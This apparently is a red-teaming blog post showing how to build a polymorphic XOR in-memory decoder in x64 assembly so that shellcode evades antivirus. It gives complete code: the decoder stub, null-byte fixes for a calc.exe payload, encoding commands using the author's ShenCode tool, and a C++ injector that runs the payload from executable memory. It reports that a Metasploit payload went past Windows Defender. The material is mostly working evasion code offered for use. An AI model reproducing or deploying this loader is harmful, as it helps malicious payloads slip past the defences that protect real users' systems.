
IT-Security, Windows, Kali, pentest, obfuscation, blog, english

Obfuscation: polymorphic in-memory decoder

Red-teaming and penetration tests often require antivirus scanners to be bypassed so that security vulnerabilities can be identified effectively. In the previous part, we disguised shellcode as UUIDs in the source code. This worked well at the source level, but the shellcode was still recognised in memory and blocked.

We now want to solve this with a polymorphic in-memory decoder: A shellcode that decodes shellcode.

XOR decoder

I took the XOR decoder from doyler.net and adapted it to the x64 architecture. This was quite simple, as only the registers had to be replaced with their 64-bit counterparts. The decoder starts with this instruction:

_start:
    jmp short call_decoder      ; Begin of JMP-CALL-POP

JMP-CALL-POP is a technique for writing position-independent code: it lets the shellcode find the address of its own data without knowing where it will be loaded in memory. In the first step, we jump to the label call_decoder.

call_decoder:
    call decoder        ; pushes the address of the next instruction (the shellcode) onto the stack
 
    ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6...

The CALL instruction transfers control to another part of the programme (decoder). In doing so, it pushes the return address, i.e. the address of the next instruction, onto the stack, and RSP then points to it. In our case, that address is the start of the encoded shellcode.

decoder:
    pop rsi                     ; Move pointer to encoded shellcode into RSI from the stack

In the called part of the programme, pop rsi takes this address off the stack and stores it in RSI. RSI now tells us where our shellcode is located in memory.

Now we move on to the actual decryption routine:

decode:
    xor byte [rsi], 0x3F      ; The byte RSI points to, will be XORed by 0x3F
    jz Shellcode              ; leave the loop once the byte decodes to 0 ([RSI] XOR 0x3F = 0)
    inc rsi                   ; increment RSI to decode the next byte
    jmp short decode          ; loop until each byte was decoded

xor byte [rsi], 0x3F decodes the byte addressed by RSI in place. On the first pass, this is the first byte of the shellcode. The key for decoding is 0x3F and has to match the key used for encoding.

jz Shellcode then checks whether the decoded byte is 0x00. XOR sets the zero flag when its result is zero, so no separate comparison is needed.

$Byte \neq 0$

If the decoded byte is not zero, the jump is not taken and execution continues with the next instruction: inc rsi

RSI is incremented and thus points to the next byte in the shellcode, which is decoded in the next iteration. jmp short decode jumps back to the beginning of the loop.

$Byte = 0$

If the decoded byte is zero, the loop ends and execution jumps to the shellcode. This is why the key itself must be appended to the end of the encoded shellcode:

0x3F XOR 0x3F = 0x00

This marks the end of the shellcode and interrupts the loop. We therefore do not need an additional counter.

jz Shellcode then jumps directly to our decoded shellcode and executes it.
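To make the control flow concrete, here is a small Python simulation of the loop. It is a sketch for illustration only, not part of the stub: it XORs one byte at a time and stops at the first byte that decodes to 0x00, which is exactly the role of the appended key. The function name simulate_decoder and the sample bytes (a nop and a ret) are hypothetical.

```python
def simulate_decoder(encoded: bytes, key: int) -> bytes:
    """Mimic the NASM loop: XOR each byte in place until one decodes to 0x00.

    Returns the decoded payload without the terminating zero byte.
    """
    buf = bytearray(encoded)
    for i in range(len(buf)):
        buf[i] ^= key            # xor byte [rsi], key
        if buf[i] == 0:          # jz Shellcode (XOR has set the zero flag)
            return bytes(buf[:i])
        # otherwise: inc rsi / jmp short decode, i.e. continue with the next byte
    # The real stub has no length check and would keep decoding past the buffer
    raise ValueError("no terminator found")


# 0x90 (nop) and 0xC3 (ret) encoded with 0x3F, followed by the key as terminator
encoded = bytes([0x90 ^ 0x3F, 0xC3 ^ 0x3F, 0x3F])
print(simulate_decoder(encoded, 0x3F).hex())  # 90c3
```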

calc.exe Payload

We want to execute the calc.exe payload from this blog post. However, it still contains null bytes (0x00), which break the decoding. Why is this the case? Here is an example:

# Encoding
XOR Key: 0x3F
Byte: 0x00
0x00 XOR 0x3F = 0x3F

# Decoding
XOR Key: 0x3F
Byte: 0x3F
0x3F XOR 0x3F = 0x00

A null byte in the original shellcode would therefore abort the decoding loop early, since jz Shellcode treats the resulting 0x00 as the end marker. We therefore need to make a few modifications.
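A quick way to check a payload before encoding is to list the offsets of all null bytes, since each one would stop the loop early. The sketch below uses a hypothetical helper, null_byte_offsets, and applies it to the two GS register encodings discussed in the next section.

```python
KEY = 0x3F

# An encoded null byte equals the key, i.e. exactly the terminator value
assert (0x00 ^ KEY) == KEY


def null_byte_offsets(shellcode: bytes) -> list[int]:
    """Return the offsets of all 0x00 bytes; each would end the decoding loop early."""
    return [offset for offset, value in enumerate(shellcode) if value == 0x00]


old_gs = bytes.fromhex("65488b00")    # mov rax, gs:[rax]
new_gs = bytes.fromhex("65488b4060")  # mov rax, gs:[rax+0x60]
print(null_byte_offsets(old_gs))  # [3]
print(null_byte_offsets(new_gs))  # []
```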

GS Register

The fix for the GS register from the previous post only removes two of the three null bytes. This was sufficient for the previous tests, but here every null byte has to go. A small change gets us there:

xor rax, rax
mov al, 60h
mov rax, gs:[rax]             ; 65 48 8b 00

change to:

xor rax, rax
mov rax, gs:[rax+0x60]        ; 65 48 8b 40 60

This also makes our shellcode one byte smaller.

Kernel32-Base

When searching for the Kernel32 base address, the original code dereferences RAX straight back into RAX without an offset. The resulting ModRM byte is 0x00, which is again a null byte. Using RBX as an intermediate register changes the ModRM byte and avoids the null bytes.

mov rax, [rax]				; 48 8b 00
mov rax, [rax]  			; 48 8b 00

change to:

mov rbx, [rax]  			; 48 8b 18
mov rax, [rbx]   			; 48 8b 03

JMP SHORT

jmp short InvokeWinExec            ; eb 00

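eb 00 is a short jump with a displacement of zero, so it simply jumps to the next instruction. Since execution continues there anyway without the JMP, we can comment out the line and get rid of another null byte.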

Compile

We can now compile the code and get opcodes without null bytes.

nasm -f win64 calc.asm -o calc.o

XOR decoder stub

Prepare calc.exe payload

We now need to prepare the opcodes a little so that we can use them in the decoder. I use my shellcode tool ShenCode for this:

python shencode.py extract -i calc.o -o calc.raw -fb 60 -lb 311
...
python shencode.py xorencode -i calc.raw -o calc.xor -k 63
...
python shencode.py formatout -i calc.xor -s cs
[*] processing shellcode format...
0x6a,0x77,0xb6,
...
0x07,0x77,0xbc,0xfb,0x27,0x77,0xbc,0xfb,0x37,0x62
[+] DONE!

Step by step:

We extract the actual shellcode from calc.o and save it in calc.raw (from offset 60 to 311).
We encode the extracted code with the key 63 and save the result in calc.xor; 63 decimal corresponds to 0x3F hexadecimal.
We output the encoded shellcode in C# format (which we can also use for assembler).

We save the output, remove the line breaks and append our "magic byte" 0x3F at the end.
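The manual steps above (XOR encoding, appending the magic byte and formatting the bytes for db) can be sketched in Python as follows. The helpers xor_encode_with_terminator and to_db_list are hypothetical and not ShenCode's implementation; the encoder refuses input containing null bytes, since those would end the decoder loop early.

```python
def xor_encode_with_terminator(shellcode: bytes, key: int) -> bytes:
    """XOR-encode shellcode and append the key, which later decodes to the 0x00 end marker."""
    if not 0x01 <= key <= 0xFF:
        raise ValueError("key must be a non-zero single byte")
    if 0x00 in shellcode:
        raise ValueError(f"null byte at offset {shellcode.index(0)} would stop the decoder early")
    return bytes(b ^ key for b in shellcode) + bytes([key])


def to_db_list(data: bytes) -> str:
    """Format bytes as a comma-separated list for NASM's db directive."""
    return ",".join(f"0x{b:02x}" for b in data)


encoded = xor_encode_with_terminator(bytes([0x55, 0x48, 0x89]), 0x3F)
print("Shellcode: db " + to_db_list(encoded))  # Shellcode: db 0x6a,0x77,0xb6,0x3f
```

As a consistency check: XORing 0x55, 0x48 and 0x89 with 0x3F yields 0x6a, 0x77 and 0xb6, the first three bytes of the encoded output above.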

XOR decoder and payload

Now we can add our payload to the XOR decoder. To do this, we paste the prepared bytes into the Shellcode: db line at the end of the XOR decoder:

 ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6,...0x37,0x62,0x3f

We also check that the XOR key in the decoder matches the one used for encoding:

decode:
    xor byte [rsi], 0x3F

If everything is correct, we compile our decoder:

nasm -f win64 xor-decoder.asm -o xor-decoder.o

We then search for the shellcode offsets, extract our code and prepare it for our Inject.cpp file:

python shencode.py formatout -i xor-decoder.o -s inspect
 
0x00000048: 00 00 00 00 00 00 00 00
0x00000056: 20 00 50 60 eb 0b 5e 80     Offset=60
0x00000064: 36 3f 74 0a 48 ff c6 eb
...
0x00000320: bc fb 27 77 bc fb 37 62
0x00000328: 3f 2e 66 69 6c 65 00 00     Offset=329
0x00000336: 00 00 00 00 00 fe ff 00
 
python shencode.py extract -i xor-decoder.o -o xor-decoder.stub -fb 60 -lb 329
 
[*] try to open file
[+] reading xor-decoder.o successful!
[*] cutting shellcode from 60 to 329
[+] written shellcode to xor-decoder.stub
[+] DONE!
 
python shencode.py formatout -i xor-decoder.stub -s c
 
[*] processing shellcode format...
"\xeb\x0b\x5e...\x37\x62\x3f"";
[+] DONE!
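In the inspect output, the row labels appear to be decimal offsets despite their 0x prefix: the rows advance by 8, the first stub byte eb sits at position 4 of row 56 (offset 60), and the terminator 3f is the first byte of row 328, directly followed by 2e 66 69 6c 65 (".file"), which no longer belongs to the stub. The extract call with -lb 329 is therefore consistent with an exclusive end offset. The following sketch mirrors the extract and formatout -s c steps under that assumption; extract_range and to_c_string are hypothetical helpers, not ShenCode's code.

```python
def extract_range(data: bytes, first: int, last: int) -> bytes:
    """Cut data[first:last]; 'last' is treated as exclusive (an assumption)."""
    if not 0 <= first < last <= len(data):
        raise ValueError(f"invalid range {first}..{last} for {len(data)} bytes")
    return data[first:last]


def to_c_string(data: bytes) -> str:
    """Format bytes as a C string literal made of \\xNN escapes."""
    return '"' + "".join(f"\\x{b:02x}" for b in data) + '"'


# Row 56 of the inspect output: the stub starts at position 4 of this row (offset 60)
row_56 = bytes.fromhex("20005060eb0b5e80")
start = 60 - 56
print(to_c_string(extract_range(row_56, start, len(row_56))))  # "\xeb\x0b\x5e\x80"
```

For the real object file, the equivalent call would be extract_range(Path("xor-decoder.o").read_bytes(), 60, 329) with Path imported from pathlib, which under this assumption yields 269 bytes.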

Inject.cpp

We can now insert the bytes we have just prepared into our injector programme and compile it.

#include <stdio.h>
#include <windows.h>
#include <iostream>
#pragma warning
 
unsigned char payload[] =
"\xeb\x0b\x5e...\x37\x62\x3f";
 
int main() {
    size_t byteArrayLength = sizeof(payload);
    std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;
    void* (*memcpyPtr) (void*, const void*, size_t);
    void* exec = VirtualAlloc(0, byteArrayLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpyPtr = &memcpy;
	memcpyPtr(exec, payload, byteArrayLength);
	((void(*)())exec)();
    return 0;
}

Debug

For testing purposes, I started a debugger and navigated to the memory area of the XOR decoder. Stepping through it, you can see how the instructions in the lower area are decoded one by one. In the images, this is the area below the call instruction (which corresponds to Shellcode: db ...).

The animation above shows the decoding loop, while the shellcode in the lower area is decoded step by step.

Test with a Metasploit payload

The whole thing also works with a Metasploit payload:

Conclusion

To simplify the process, I have integrated the XOR stub into ShenCode as a template. Two commands are enough to generate an XOR in-memory decoder:

python shencode.py xorencode -i input.raw -o xor.out --key 63
python shencode.py xorpoly -i xor.out -o stub.raw --key 63

The XOR decoder proved effective against detection in memory. In combination with other obfuscation techniques, it can be a useful aid in penetration tests. In my test, even the Metasploit payload was not detected by Windows Defender.